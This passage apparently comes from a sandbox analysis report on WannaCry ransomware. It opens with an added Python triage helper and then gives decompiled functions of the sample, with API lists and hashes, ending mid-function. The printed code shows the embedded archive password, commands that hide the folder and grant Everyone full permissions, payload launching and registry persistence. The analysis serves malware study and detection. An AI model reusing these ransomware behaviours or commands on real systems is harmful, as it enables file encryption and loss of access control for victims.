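The two listings above show the sample resolving its file-I/O exports (kernel32.dll, resolver at 0x0040172C) and its CryptoAPI exports (advapi32.dll, function E00401A45) by name at runtime through LoadLibraryA/GetProcAddress rather than through the PE import table. The following Python is an added triage helper, not code from the sample, from Joe Sandbox, or from this report: it parses the report's own "APIs" bullet lines (embedded below as constructed input copied from the two listings), attributes each GetProcAddress to the most recent LoadLibraryA, and checks the result against capability sets that are an assumption chosen to match what these two resolvers look up.

```python
"""Aggregate runtime-resolved imports from Joe Sandbox "APIs" lines.

Added example for this report; not part of the sample or of Joe Sandbox.
Assumes the input is the plain-text "APIs" bullet lines as the report prints
them; the capability sets below are an analyst's assumption chosen to match
the two resolver functions shown (kernel32 file APIs, advapi32 CryptoAPI).
"""
from __future__ import annotations

import re
from collections import defaultdict

# Constructed input: the "APIs" lines copied from the two listings in this
# report (the kernel32 resolver's listing, which repeats E00401A45 as a
# subcall, followed by E00401A45's own listing).
SAMPLE_REPORT_LINES = """\
• Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
• Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
• Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
• Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
• Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
• Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
• Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
• GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
• GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
• GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
• GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
• GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
• GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
• GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
• LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
• GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
• GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
• GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
• GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
• GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
"""

# "<api>.<module>(<args>), ref: <address>" as the report prints it. The search
# is unanchored, so "Part of subcall function ...:" prefixes parse as well.
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_resolved_imports(text: str) -> dict[str, list[str]]:
    """Return {dll: [export, ...]} in resolution order.

    The sandbox prints the module handle passed to GetProcAddress as 00000000,
    so each GetProcAddress is attributed to the most recent LoadLibraryA in
    the listing, which mirrors the decompiled resolvers' control flow.
    Repeated listings (subcall lines) are deduplicated.
    """
    resolved: dict[str, list[str]] = defaultdict(list)
    current_dll = None
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")]
        if m.group("api") == "LoadLibraryA" and args:
            current_dll = args[0].lower()
        elif m.group("api") == "GetProcAddress" and current_dll and len(args) >= 2:
            if args[1] not in resolved[current_dll]:
                resolved[current_dll].append(args[1])
    return dict(resolved)


# Assumed capability sets (analyst's choice for this example): a set counts as
# present only when every listed export was resolved from the named DLL.
CAPABILITIES = {
    "cryptoapi_keys_and_encrypt": (
        "advapi32.dll",
        {"CryptAcquireContextA", "CryptImportKey", "CryptGenKey", "CryptEncrypt"},
    ),
    "file_rewrite_rename_delete": (
        "kernel32.dll",
        {"CreateFileW", "ReadFile", "WriteFile", "MoveFileW", "DeleteFileW"},
    ),
}


def capabilities(resolved: dict[str, list[str]]) -> set[str]:
    """Names of the capability sets fully covered by the resolved exports."""
    return {
        name
        for name, (dll, needed) in CAPABILITIES.items()
        if needed <= set(resolved.get(dll, []))
    }


def missing_for(resolved: dict[str, list[str]], name: str) -> set[str]:
    """Exports of one capability set that were not resolved (for triage notes)."""
    dll, needed = CAPABILITIES[name]
    return needed - set(resolved.get(dll, []))


if __name__ == "__main__":
    result = parse_resolved_imports(SAMPLE_REPORT_LINES)
    for dll, exports in result.items():
        print(f"{dll}: {', '.join(exports)}")
    print("capabilities:", sorted(capabilities(result)))
```

Because these names reach the binary only as GetProcAddress arguments, a rule keyed on the PE import directory will not see CryptEncrypt or CryptGenKey at all; the "String ID" fields in the Similarity blocks above, or the resolved API set as aggregated here, are the more reliable pivot. The capability sets are an assumption for this example, not a classification the report itself makes.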

                                                                                C-Code - Quality: 88%
                                                                                			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
                                                                                				long _v8;
                                                                                				char _v267;
                                                                                				char _v268;
                                                                                				struct _FILETIME _v284;
                                                                                				struct _FILETIME _v292;
                                                                                				struct _FILETIME _v300;
                                                                                				long _v304;
                                                                                				char _v568;
                                                                                				char _v828;
                                                                                				intOrPtr _t78;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr _t91;
                                                                                				intOrPtr _t96;
                                                                                				intOrPtr _t97;
                                                                                				char _t100;
                                                                                				void* _t112;
                                                                                				void* _t113;
                                                                                				int _t124;
                                                                                				long _t131;
                                                                                				intOrPtr _t136;
                                                                                				char* _t137;
                                                                                				char* _t144;
                                                                                				void* _t148;
                                                                                				char* _t150;
                                                                                				void* _t154;
                                                                                				signed int _t155;
                                                                                				long _t156;
                                                                                				void* _t157;
                                                                                				char* _t158;
                                                                                				long _t159;
                                                                                				intOrPtr* _t161;
                                                                                				long _t162;
                                                                                				void* _t163;
                                                                                				void* _t164;
                                                                                
                                                                                				_t154 = __edx;
                                                                                				_t139 = __ecx;
                                                                                				_t136 = _a16;
                                                                                				_t161 = __ecx;
                                                                                				if(_t136 == 3) {
                                                                                					_t78 =  *((intOrPtr*)(__ecx + 4));
                                                                                					_t155 = _a4;
                                                                                					__eflags = _t155 - _t78;
                                                                                					if(_t155 == _t78) {
                                                                                						L14:
                                                                                						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
                                                                                						__eflags = _t156;
                                                                                						if(_t156 <= 0) {
                                                                                							E00406A97( *_t161);
                                                                                							_t14 = _t161 + 4;
                                                                                							 *_t14 =  *(_t161 + 4) | 0xffffffff;
                                                                                							__eflags =  *_t14;
                                                                                						}
                                                                                						__eflags = _a7;
                                                                                						if(_a7 == 0) {
                                                                                							__eflags = _t156;
                                                                                							if(_t156 <= 0) {
                                                                                								__eflags = _t156 - 0xffffff96;
                                                                                								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                                                							}
                                                                                							return 0x600;
                                                                                						} else {
                                                                                							L17:
                                                                                							return 0;
                                                                                						}
                                                                                					}
                                                                                					__eflags = _t78 - 0xffffffff;
                                                                                					if(_t78 != 0xffffffff) {
                                                                                						E00406A97( *__ecx);
                                                                                						_pop(_t139);
                                                                                					}
                                                                                					_t89 =  *_t161;
                                                                                					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                                                					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
                                                                                					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
                                                                                						L3:
                                                                                						return 0x10000;
                                                                                					} else {
                                                                                						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
                                                                                						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
                                                                                							L11:
                                                                                							_t91 =  *_t161;
                                                                                							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
                                                                                							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
                                                                                								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                                                								 *(_t161 + 4) = _t155;
                                                                                								_pop(_t139);
                                                                                								goto L14;
                                                                                							}
                                                                                							E00406520(_t91);
                                                                                							L10:
                                                                                							goto L11;
                                                                                						}
                                                                                						E004064E2(_t139, _t89);
                                                                                						goto L10;
                                                                                					}
                                                                                				}
                                                                                				if(_t136 == 2 || _t136 == 1) {
                                                                                					__eflags =  *(_t161 + 4) - 0xffffffff;
                                                                                					if( *(_t161 + 4) != 0xffffffff) {
                                                                                						E00406A97( *_t161);
                                                                                						_pop(_t139);
                                                                                					}
                                                                                					_t96 =  *_t161;
                                                                                					_t157 = _a4;
                                                                                					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                                                					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
                                                                                					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
                                                                                						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
                                                                                							L27:
                                                                                							_t97 =  *_t161;
                                                                                							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
                                                                                							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
                                                                                								E00406C40(_t161, _t154, _t157,  &_v568);
                                                                                								__eflags = _v304 & 0x00000010;
                                                                                								if((_v304 & 0x00000010) == 0) {
                                                                                									__eflags = _t136 - 1;
                                                                                									if(_t136 != 1) {
                                                                                										_t158 = _a8;
                                                                                										_t137 = _t158;
                                                                                										_t144 = _t158;
                                                                                										_t100 =  *_t158;
                                                                                										while(1) {
                                                                                											__eflags = _t100;
                                                                                											if(_t100 == 0) {
                                                                                												break;
                                                                                											}
                                                                                											__eflags = _t100 - 0x2f;
                                                                                											if(_t100 == 0x2f) {
                                                                                												L44:
                                                                                												_t137 =  &(_t144[1]);
                                                                                												L45:
                                                                                												_t100 = _t144[1];
                                                                                												_t144 =  &(_t144[1]);
                                                                                												continue;
                                                                                											}
                                                                                											__eflags = _t100 - 0x5c;
                                                                                											if(_t100 != 0x5c) {
                                                                                												goto L45;
                                                                                											}
                                                                                											goto L44;
                                                                                										}
                                                                                										strcpy( &_v268, _t158);
                                                                                										__eflags = _t137 - _t158;
                                                                                										if(_t137 != _t158) {
                                                                                											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
                                                                                											__eflags = _v268 - 0x2f;
                                                                                											if(_v268 == 0x2f) {
                                                                                												L56:
                                                                                												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
                                                                                												E00407070(0,  &_v268);
                                                                                												_t164 = _t164 + 0x18;
                                                                                												L49:
                                                                                												__eflags = 0;
                                                                                												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
                                                                                												L50:
                                                                                												__eflags = _t112 - 0xffffffff;
                                                                                												_a4 = _t112;
                                                                                												if(_t112 != 0xffffffff) {
                                                                                													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                                                													__eflags =  *(_t161 + 0x13c);
                                                                                													_pop(_t148);
                                                                                													if( *(_t161 + 0x13c) == 0) {
                                                                                														L00407700();
                                                                                														_t148 = 0x4000;
                                                                                														 *(_t161 + 0x13c) = _t113;
                                                                                													}
                                                                                													_t60 =  &_a12;
                                                                                													 *_t60 = _a12 & 0x00000000;
                                                                                													__eflags =  *_t60;
                                                                                													while(1) {
                                                                                														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
                                                                                														_t164 = _t164 + 0x10;
                                                                                														__eflags = _t159 - 0xffffff96;
                                                                                														if(_t159 == 0xffffff96) {
                                                                                															break;
                                                                                														}
                                                                                														__eflags = _t159;
                                                                                														if(__eflags < 0) {
                                                                                															L68:
                                                                                															_a12 = 0x5000000;
                                                                                															L71:
                                                                                															__eflags = _a16 - 1;
                                                                                															if(_a16 != 1) {
                                                                                																CloseHandle(_a4);
                                                                                															}
                                                                                															E00406A97( *_t161);
                                                                                															return _a12;
                                                                                														}
                                                                                														if(__eflags <= 0) {
                                                                                															L64:
                                                                                															__eflags = _a11;
                                                                                															if(_a11 != 0) {
                                                                                																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
                                                                                																goto L71;
                                                                                															}
                                                                                															__eflags = _t159;
                                                                                															if(_t159 == 0) {
                                                                                																goto L68;
                                                                                															}
                                                                                															continue;
                                                                                														}
                                                                                														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
                                                                                														__eflags = _t124;
                                                                                														if(_t124 == 0) {
                                                                                															_a12 = 0x400;
                                                                                															goto L71;
                                                                                														}
                                                                                														goto L64;
                                                                                													}
                                                                                													_a12 = 0x1000;
                                                                                													goto L71;
                                                                                												}
                                                                                												return 0x200;
                                                                                											}
                                                                                											__eflags = _v268 - 0x5c;
                                                                                											if(_v268 == 0x5c) {
                                                                                												goto L56;
                                                                                											}
                                                                                											__eflags = _v268;
                                                                                											if(_v268 == 0) {
                                                                                												L48:
                                                                                												_t160 = _t161 + 0x140;
                                                                                												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
                                                                                												E00407070(_t160,  &_v268);
                                                                                												_t164 = _t164 + 0x1c;
                                                                                												goto L49;
                                                                                											}
                                                                                											__eflags = _v267 - 0x3a;
                                                                                											if(_v267 != 0x3a) {
                                                                                												goto L48;
                                                                                											}
                                                                                											goto L56;
                                                                                										}
                                                                                										_t37 =  &_v268;
                                                                                										 *_t37 = _v268 & 0x00000000;
                                                                                										__eflags =  *_t37;
                                                                                										goto L48;
                                                                                									}
                                                                                									_t112 = _a8;
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t136 - 1;
                                                                                								if(_t136 == 1) {
                                                                                									goto L17;
                                                                                								}
                                                                                								_t150 = _a8;
                                                                                								_t131 =  *_t150;
                                                                                								__eflags = _t131 - 0x2f;
                                                                                								if(_t131 == 0x2f) {
                                                                                									L35:
                                                                                									_push(_t150);
                                                                                									_push(0);
                                                                                									L37:
                                                                                									E00407070();
                                                                                									goto L17;
                                                                                								}
                                                                                								__eflags = _t131 - 0x5c;
                                                                                								if(_t131 == 0x5c) {
                                                                                									goto L35;
                                                                                								}
                                                                                								__eflags = _t131;
                                                                                								if(_t131 == 0) {
                                                                                									L36:
                                                                                									_t162 = _t161 + 0x140;
                                                                                									__eflags = _t162;
                                                                                									_push(_t150);
                                                                                									_push(_t162);
                                                                                									goto L37;
                                                                                								}
                                                                                								__eflags = _t150[1] - 0x3a;
                                                                                								if(_t150[1] != 0x3a) {
                                                                                									goto L36;
                                                                                								}
                                                                                								goto L35;
                                                                                							}
                                                                                							E00406520(_t97);
                                                                                							L26:
                                                                                							goto L27;
                                                                                						}
                                                                                						E004064E2(_t139, _t96);
                                                                                						goto L26;
                                                                                					}
                                                                                				} else {
                                                                                					goto L3;
                                                                                				}
                                                                                			}
                                                                                0x0040741b
                                                                                0x0040741d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040741f
                                                                                0x0040740b
                                                                                0x00407411
                                                                                0x00407413
                                                                                0x00407433
                                                                                0x00000000
                                                                                0x00407433
                                                                                0x00000000
                                                                                0x00407413
                                                                                0x00407421
                                                                                0x00000000
                                                                                0x00407421
                                                                                0x00000000
                                                                                0x00407339
                                                                                0x00407358
                                                                                0x0040735f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407361
                                                                                0x00407368
                                                                                0x004072e1
                                                                                0x004072e7
                                                                                0x004072fc
                                                                                0x0040730a
                                                                                0x0040730f
                                                                                0x00000000
                                                                                0x0040730f
                                                                                0x0040736e
                                                                                0x00407375
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407375
                                                                                0x004072da
                                                                                0x004072da
                                                                                0x004072da
                                                                                0x00000000
                                                                                0x004072da
                                                                                0x004072a1
                                                                                0x00000000
                                                                                0x004072a1
                                                                                0x00407263
                                                                                0x00407266
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040726c
                                                                                0x0040726f
                                                                                0x00407271
                                                                                0x00407273
                                                                                0x00407283
                                                                                0x00407283
                                                                                0x00407284
                                                                                0x00407290
                                                                                0x00407290
                                                                                0x00000000
                                                                                0x00407296
                                                                                0x00407275
                                                                                0x00407277
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407279
                                                                                0x0040727b
                                                                                0x00407288
                                                                                0x00407288
                                                                                0x00407288
                                                                                0x0040728e
                                                                                0x0040728f
                                                                                0x00000000
                                                                                0x0040728f
                                                                                0x0040727d
                                                                                0x00407281
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407281
                                                                                0x00407244
                                                                                0x0040723b
                                                                                0x00000000
                                                                                0x0040723b
                                                                                0x00407236
                                                                                0x00000000
                                                                                0x00407236
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %s%s$%s%s%s$:$\
                                                                                • API String ID: 0-1100577047
                                                                                • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                                                                                • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E0040203B(intOrPtr* __eax, void* __edi) {
                                                                                				void* _t25;
                                                                                				intOrPtr* _t33;
                                                                                				int _t42;
                                                                                				CHAR* _t63;
                                                                                				void* _t64;
                                                                                				char** _t66;
                                                                                
                                                                                				__imp____p___argv();
                                                                                				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
                                                                                					L4:
                                                                                					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
                                                                                						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
                                                                                					}
                                                                                					SetCurrentDirectoryA(_t64 - 0x20c);
                                                                                					E004010FD(1);
                                                                                					 *_t66 = "WNcry@2ol7";
                                                                                					_push(_t42);
                                                                                					L00401DAB();
                                                                                					E00401E9E();
                                                                                					E00401064("attrib +h .", _t42, _t42);
                                                                                					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
                                                                                					_t25 = E0040170A();
                                                                                					_t74 = _t25;
                                                                                					if(_t25 != 0) {
                                                                                						E004012FD(_t64 - 0x6e4, _t74);
                                                                                						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
                                                                                							 *(_t64 - 4) = _t42;
                                                                                							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
                                                                                								_t33 = E00402924(_t32, "TaskStart");
                                                                                								_t78 = _t33 - _t42;
                                                                                								if(_t33 != _t42) {
                                                                                									 *_t33(_t42, _t42);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						E0040137A(_t64 - 0x6e4, _t78);
                                                                                					}
                                                                                					goto L13;
                                                                                				} else {
                                                                                					_t63 = "tasksche.exe";
                                                                                					CopyFileA(_t64 - 0x20c, _t63, _t42);
                                                                                					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						L13:
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                			}









                                                                                Instruction addresses, one per decompiled line of E0040203B above (0x00000000 = line with no address): 0x00402040, 0x00402054, 0x0040208e, 0x004020a3, 0x004020b1, 0x004020b3, 0x004020bb, 0x004020c3, 0x004020c8, 0x004020cf, 0x004020d0, 0x004020d5, 0x004020e1, 0x004020ed, 0x004020f5, 0x004020fa, 0x004020fc, 0x00402104, 0x00402119, 0x0040212a, 0x00402134, 0x0040214b, 0x00402151, 0x00402154, 0x00402158, 0x00402158, 0x00402154, 0x00402134, 0x00402160, 0x00402160, 0x00000000, 0x00402061, 0x00402061, 0x0040206f, 0x0040207f, 0x00000000, 0x00402165, 0x00402165, 0x0040216b, 0x0040216b, 0x0040207f

                                                                                APIs
                                                                                • __p___argv.MSVCRT(0040F538), ref: 00402040
                                                                                • strcmp.MSVCRT(?), ref: 0040204B
                                                                                • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                                                                                • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                                                                                  • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                                                                                • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                                                                                • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                                                                                  • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                  • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                  • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                  • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                                                                                • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                                                                                • API String ID: 1074704982-2844324180
                                                                                • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                                                                                • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E004010FD(intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				int _v16;
                                                                                				void _v196;
                                                                                				long _v216;
                                                                                				void _v735;
                                                                                				char _v736;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                				signed int _t55;
                                                                                				signed int _t56;
                                                                                				char* _t72;
                                                                                				void* _t77;
                                                                                
                                                                                				_t56 = 5;
                                                                                				memcpy( &_v216, L"Software\\", _t56 << 2);
                                                                                				_push(0x2d);
                                                                                				_v736 = _v736 & 0;
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
                                                                                				asm("stosw");
                                                                                				asm("stosb");
                                                                                				wcscat( &_v216, L"WanaCrypt0r");
                                                                                				_v12 = _v12 & 0x00000000;
                                                                                				_t72 = "wd";
                                                                                				do {
                                                                                					_push( &_v8);
                                                                                					_push( &_v216);
                                                                                					if(_v12 != 0) {
                                                                                						_push(0x80000001);
                                                                                					} else {
                                                                                						_push(0x80000002);
                                                                                					}
                                                                                					RegCreateKeyW();
                                                                                					if(_v8 != 0) {
                                                                                						if(_a4 == 0) {
                                                                                							_v16 = 0x207;
                                                                                							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
                                                                                							asm("sbb esi, esi");
                                                                                							_t77 =  ~_t44 + 1;
                                                                                							if(_t77 != 0) {
                                                                                								SetCurrentDirectoryA( &_v736);
                                                                                							}
                                                                                						} else {
                                                                                							GetCurrentDirectoryA(0x207,  &_v736);
                                                                                							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
                                                                                							asm("sbb esi, esi");
                                                                                							_t77 =  ~_t55 + 1;
                                                                                						}
                                                                                						RegCloseKey(_v8);
                                                                                						if(_t77 != 0) {
                                                                                							_t46 = 1;
                                                                                							return _t46;
                                                                                						} else {
                                                                                							goto L10;
                                                                                						}
                                                                                					}
                                                                                					L10:
                                                                                					_v12 = _v12 + 1;
                                                                                				} while (_v12 < 2);
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                                                                                • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                                                                                • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                                                                                • strlen.MSVCRT(?), ref: 004011A7
                                                                                • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                                                                                • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                                                                                • String ID: 0@$Software\$WanaCrypt0r
                                                                                • API String ID: 865909632-3421300005
                                                                                • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                                                                                • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E00401B5F(intOrPtr _a4) {
                                                                                				void _v202;
                                                                                				short _v204;
                                                                                				void _v722;
                                                                                				long _v724;
                                                                                				signed short _v1240;
                                                                                				void _v1242;
                                                                                				long _v1244;
                                                                                				void* _t55;
                                                                                				signed int _t65;
                                                                                				void* _t72;
                                                                                				long _t83;
                                                                                				void* _t94;
                                                                                				void* _t98;
                                                                                
                                                                                				_t83 =  *0x40f874; // 0x0
                                                                                				_v1244 = _t83;
                                                                                				memset( &_v1242, 0, 0x81 << 2);
                                                                                				asm("stosw");
                                                                                				_v724 = _t83;
                                                                                				memset( &_v722, 0, 0x81 << 2);
                                                                                				asm("stosw");
                                                                                				_push(0x31);
                                                                                				_v204 = _t83;
                                                                                				memset( &_v202, 0, 0 << 2);
                                                                                				asm("stosw");
